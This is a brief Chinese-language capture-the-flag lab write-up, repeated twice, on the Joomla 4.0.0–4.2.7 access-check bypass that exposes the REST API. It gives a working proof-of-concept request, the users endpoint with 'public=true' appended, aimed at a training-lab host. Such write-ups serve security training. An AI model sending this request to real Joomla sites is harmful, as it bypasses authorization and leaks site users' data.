简介
Joomla是一个开源免费的内容管理系统(CMS),基于PHP开发。在其4.0.0版本到4.2.7版本中,存在一处属性覆盖漏洞,导致攻击者可以通过恶意请求绕过权限检查,访问任意Rest API。
正文
1.进入靶场
2.POC利用
https://eci-2zecvr9tqvow5oyf22o3.cloudeci1.ichunqiu.com/api/index.php/v1/users?public=true
3.得到flag
Joomla是一个开源免费的内容管理系统(CMS),基于PHP开发。在其4.0.0版本到4.2.7版本中,存在一处属性覆盖漏洞,导致攻击者可以通过恶意请求绕过权限检查,访问任意Rest API。
1.进入靶场
2.POC利用
https://eci-2zecvr9tqvow5oyf22o3.cloudeci1.ichunqiu.com/api/index.php/v1/users?public=true
3.得到flag